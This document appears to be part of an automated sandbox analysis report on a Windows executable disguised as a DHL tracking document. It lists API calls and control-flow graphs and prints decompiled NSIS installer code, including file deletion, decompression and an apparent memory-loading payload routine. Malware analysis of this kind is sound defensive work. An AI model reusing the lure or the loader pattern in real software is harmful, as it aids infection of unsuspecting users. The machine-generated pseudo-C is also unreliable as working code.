                    0x00403570
                    0x00403578
                    0x00403578
                    0x0040354c
                    0x00403538
                    0x00403534
                    0x0040357d
                    0x00403583
                    0x00403585
                    0x00403589
                    0x00403589
                    0x00403585
                    0x0040358e
                    0x00403593
                    0x00403596
                    0x00403598
                    0x00403598
                    0x004035a0
                    0x004035a0
                    0x0040342f
                    0x00403436
                    0x00403436
                    0x004033ac
                    0x004033b2
                    0x00403401
                    0x00403401
                    0x0040340d
                    0x00000000
                    0x0040340d
                    0x004033bb
                    0x004033c8
                    0x004033bf
                    0x004033c5
                    0x00000000
                    0x00000000
                    0x004033c7
                    0x004033c7
                    0x004033c7
                    0x004033cc
                    0x004033ce
                    0x004033d6
                    0x00403442
                    0x00403447
                    0x00403456
                    0x00000000
                    0x00000000
                    0x0040345a
                    0x00403461
                    0x00403467
                    0x0040346d
                    0x00403475
                    0x00403475
                    0x00403483
                    0x0040348a
                    0x00403493
                    0x00403499
                    0x00403499
                    0x004034a5
                    0x004034ab
                    0x004034b5
                    0x004034c9
                    0x004034ca
                    0x004034cb
                    0x004034d0
                    0x004034dc
                    0x004034e2
                    0x004034e9
                    0x004034ec
                    0x004034f2
                    0x004034f2
                    0x004034e9
                    0x004034f6
                    0x004034fc
                    0x004034fc
                    0x004034ff
                    0x00403500
                    0x00403501
                    0x00000000
                    0x00403501
                    0x004033d8
                    0x004033da
                    0x004033e5
                    0x00000000
                    0x00000000
                    0x004033ed
                    0x004033f8
                    0x004033fd
                    0x00000000
                    0x004033fd
                    0x00403379
                    0x00403385
                    0x0040338a
                    0x0040338f
                    0x00403391
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403391
                    0x00000000
                    0x0040332e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004032e2
                    0x004032e2
                    0x004032e2
                    0x004032e3
                    0x004032e3
                    0x00000000
                    0x004032e2
                    0x00000000

                    APIs
                    • #17.COMCTL32 ref: 00403244
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                    • OleInitialize.OLE32(00000000), ref: 00403256
                      • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                      • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,nkdpnsqeoocyepqnevm Setup,NSIS Error), ref: 00405A92
                    • GetCommandLineA.KERNEL32(nkdpnsqeoocyepqnevm Setup,NSIS Error), ref: 00403293
                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000), ref: 004032A6
                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000020), ref: 004032D1
                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                    • DeleteFileA.KERNELBASE(1033), ref: 00403398
                    • OleUninitialize.OLE32(00000000), ref: 00403416
                    • ExitProcess.KERNEL32 ref: 00403436
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000,00000000), ref: 00403442
                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000,00000000), ref: 0040344E
                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                    • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,0041F050,00000001), ref: 004034BF
                    • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                    • ExitProcess.KERNEL32 ref: 004035A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                    • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$nkdpnsqeoocyepqnevm Setup$~nsu.tmp
                    • API String ID: 2278157092-2491226936
                    • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                    • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                    • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                    • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 260 405525-405528 257->260 261 405532-40553a call 405d7c 260->261 262 40552a-405530 260->262 261->253 271 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->271 262->253 266 40541f-405422 263->266 264->266 269 405424-40542b 266->269 270 40542d-405433 lstrcatA 266->270 269->270 272 405438-405456 lstrlenA FindFirstFileA 269->272 270->272 287 405553-405557 271->287 288 40556a-40556d call 404e23 271->288 274 405513-405517 272->274 275 40545c-405473 call 4055a3 272->275 274->257 277 405519 274->277 281 405475-405479 275->281 282 40547e-405481 275->282 277->257 281->282 284 40547b 281->284 285 405483-405488 282->285 286 405494-4054a2 call 405a85 282->286 284->282 290 4054f2-405504 FindNextFileA 285->290 291 40548a-40548c 285->291 298 4054a4-4054ac 286->298 299 4054b9-4054c8 call 40573d DeleteFileA 286->299 287->262 293 405559-405568 call 404e23 call 4057d3 287->293 288->253 290->275 296 40550a-40550d FindClose 290->296 291->286 294 40548e-405492 291->294 293->253 294->286 294->290 296->274 298->290 301 4054ae-4054b7 call 4053aa 298->301 307 4054ea-4054ed call 404e23 299->307 308 4054ca-4054ce 299->308 301->290 307->290 310 4054d0-4054e0 call 404e23 call 4057d3 308->310 311 4054e2-4054e8 308->311 310->290 311->290
                    C-Code - Quality: 94%
                    			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                    0x004053b5
                    0x004053b9
                    0x004053c2
                    0x004053c5
                    0x004053c8
                    0x004053d0
                    0x004053d2
                    0x004053d3
                    0x00000000
                    0x004053d3
                    0x004053e2
                    0x004053e2
                    0x004053e5
                    0x004053e8
                    0x004053fc
                    0x00405403
                    0x00405408
                    0x0040540a
                    0x0040541a
                    0x0040540c
                    0x00405412
                    0x00405412
                    0x0040541f
                    0x00405422
                    0x0040542d
                    0x00405433
                    0x00405438
                    0x00405448
                    0x0040544a
                    0x00405450
                    0x00405453
                    0x00405456
                    0x00405513
                    0x00405513
                    0x00405517
                    0x00405519
                    0x00405519
                    0x00405519
                    0x00405519
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040545c
                    0x0040545c
                    0x00405465
                    0x0040546b
                    0x00405470
                    0x00405473
                    0x00405475
                    0x00405479
                    0x0040547b
                    0x0040547b
                    0x00405479
                    0x0040547e
                    0x00405481
                    0x00405494
                    0x00405496
                    0x0040549b
                    0x004054a2
                    0x004054ba
                    0x004054c0
                    0x004054c6
                    0x004054c8
                    0x004054ed
                    0x004054ca
                    0x004054ca
                    0x004054ce
                    0x004054e2
                    0x004054d0
                    0x004054d3
                    0x004054d8
                    0x004054da
                    0x004054db
                    0x004054db
                    0x004054ce
                    0x004054a4
                    0x004054aa
                    0x004054ac
                    0x004054b2
                    0x004054b2
                    0x004054ac
                    0x00000000
                    0x004054a2
                    0x00405483
                    0x00405486
                    0x00405488
                    0x00000000
                    0x00000000
                    0x0040548a
                    0x0040548c
                    0x00000000
                    0x00000000
                    0x0040548e
                    0x00405492
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004054f2
                    0x004054fc
                    0x00405502
                    0x00405502
                    0x0040550d
                    0x00000000
                    0x0040550d
                    0x00405424
                    0x0040542b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004053ea
                    0x004053ea
                    0x004053ec
                    0x0040551d
                    0x00405520
                    0x00405523
                    0x00405575
                    0x00405575
                    0x00405575
                    0x00405525
                    0x00405528
                    0x00405533
                    0x00405538
                    0x0040553a
                    0x00000000
                    0x00000000
                    0x0040553d
                    0x00405543
                    0x00405549
                    0x0040554f
                    0x00405551
                    0x00000000
                    0x0040556d
                    0x00405553
                    0x00405557
                    0x00000000
                    0x00000000
                    0x0040555c
                    0x00405561
                    0x00405562
                    0x00000000
                    0x00405563
                    0x0040552a
                    0x0040552a
                    0x00000000
                    0x0040552a
                    0x004053f2
                    0x004053f6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004053f6

                    APIs
                    • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 004053C8
                    • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405412
                    • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405433
                    • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405439
                    • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 0040544A
                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                    • FindClose.KERNEL32(?), ref: 0040550D
                    Strings
                    • \*.*, xrefs: 0040540C
                    • "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" , xrefs: 004053B4
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                    • API String ID: 2035342205-592027580
                    • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                    • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                    • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                    • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 02380402 Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 447 2380402-23804e6 GetPEB call 2380776 * 7 call 2380744 CreateFileW 464 23804ec-23804f7 447->464 465 23805c6 447->465 464->465 470 23804fd-238050d VirtualAlloc 464->470 466 23805c8-23805cd 465->466 467 23805cf 466->467 468 23805d3-23805d8 466->468 467->468 474 23805f4-23805f7 468->474 470->465 472 2380513-2380522 ReadFile 470->472 472->465 473 2380528-2380547 VirtualAlloc 472->473 475 2380549-238055e call 23806db 473->475 476 23805c2-23805c4 473->476 477 23805f9-23805fe 474->477 478 23805da-23805de 474->478 487 2380560-238056b 475->487 488 2380597-23805a8 call 2380776 475->488 476->466 482 238060b-2380613 477->482 483 2380600-2380608 VirtualFree 477->483 480 23805ea-23805ec 478->480 481 23805e0-23805e8 478->481 485 23805ee-23805f1 480->485 486 23805f3 480->486 481->474 483->482 485->474 486->474 489 238056e-2380595 call 23806db 487->489 488->466 494 23805aa-23805af 488->494 489->488 495 23805b1-23805b2 FindCloseChangeNotification 494->495 496 23805b5-23805c0 VirtualFree 494->496 495->496 496->474
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023804DC
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 02380506
                    • ReadFile.KERNELBASE(00000000,00000000,02380248,?,00000000), ref: 0238051D
                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0238053F
                    • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,0238019C,7FDFFF66), ref: 023805B2
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 023805BD
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0238019C), ref: 02380608
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                    • String ID:
                    • API String ID: 656311269-0
                    • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                    • Instruction ID: 9ae4c4318cc6b11de72585886b1230e18ce11506e42ed8207732b3c1ee85c1e6
                    • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                    • Instruction Fuzzy Hash: D8618F31E04314ABDB24EFA4C884BAEB7B6AF48750F148059E915FB290EB349E05CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 668 40604c-406051 669 4060c2-4060e0 668->669 670 406053-406082 668->670 671 4066b8-4066cd 669->671 672 406084-406087 670->672 673 406089-40608d 670->673 676 4066e7-4066fd 671->676 677 4066cf-4066e5 671->677 678 406099-40609c 672->678 674 406095 673->674 675 40608f-406093 673->675 674->678 675->678 681 406700-406707 676->681 677->681 679 4060ba-4060bd 678->679 680 40609e-4060a7 678->680 684 40628f-4062ad 679->684 682 4060a9 680->682 683 4060ac-4060b8 680->683 685 406709-40670d 681->685 686 40672e-40673a 681->686 682->683 689 406122-406150 683->689 687 4062c5-4062d7 684->687 688 4062af-4062c3 684->688 690 406713-40672b 685->690 691 4068bc-4068c6 685->691 695 405ed0-405ed9 686->695 693 4062da-4062e4 687->693 688->693 696 406152-40616a 689->696 697 40616c-406186 689->697 690->686 694 4068d2-4068e5 691->694 699 4062e6 693->699 700 406287-40628d 693->700 698 4068ea-4068ee 694->698 701 4068e7 695->701 702 405edf 695->702 703 406189-406193 696->703 697->703 722 40626c-406284 699->722 723 40686e-406878 699->723 700->684 711 40622b-406235 700->711 701->698 707 405ee6-405eea 702->707 708 406026-406047 702->708 709 405f8b-405f8f 702->709 710 405ffb-405fff 702->710 704 406199 703->704 705 40610a-406110 703->705 728 406856-406860 704->728 729 4060ef-406107 704->729 718 4061c3-4061c9 705->718 719 406116-40611c 705->719 707->694 715 405ef0-405efd 707->715 708->671 713 405f95-405fae 709->713 714 40683b-406845 709->714 716 406005-406019 710->716 717 40684a-406854 710->717 720 40687a-406884 711->720 721 40623b-406404 711->721 724 405fb1-405fb5 713->724 714->694 715->701 727 405f03-405f49 715->727 730 40601c-406024 716->730 717->694 725 406227 718->725 726 4061cb-4061e9 718->726 719->689 719->725 720->694 721->695 722->700 723->694 724->709 732 405fb7-405fbd 724->732 725->711 733 406201-406213 726->733 734 4061eb-4061ff 726->734 735 405f71-405f73 727->735 736 405f4b-405f4f 727->736 728->694 729->705 730->708 730->710 737 405fe7-405ff9 732->737 738 405fbf-405fc6 732->738 739 406216-406220 733->739 734->739 742 405f81-405f89 735->742 743 405f75-405f7f 735->743 740 405f51-405f54 GlobalFree 736->740 741 405f5a-405f68 GlobalAlloc 736->741 737->730 744 405fd1-405fe1 GlobalAlloc 738->744 745 405fc8-405fcb GlobalFree 738->745 739->718 746 406222 739->746 740->741 741->701 747 405f6e 741->747 742->724 743->742 743->743 744->701 744->737 745->744 749 406862-40686c 746->749 750 4061a8-4061c0 746->750 747->735 749->694 750->718
                    C-Code - Quality: 98%
                    			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
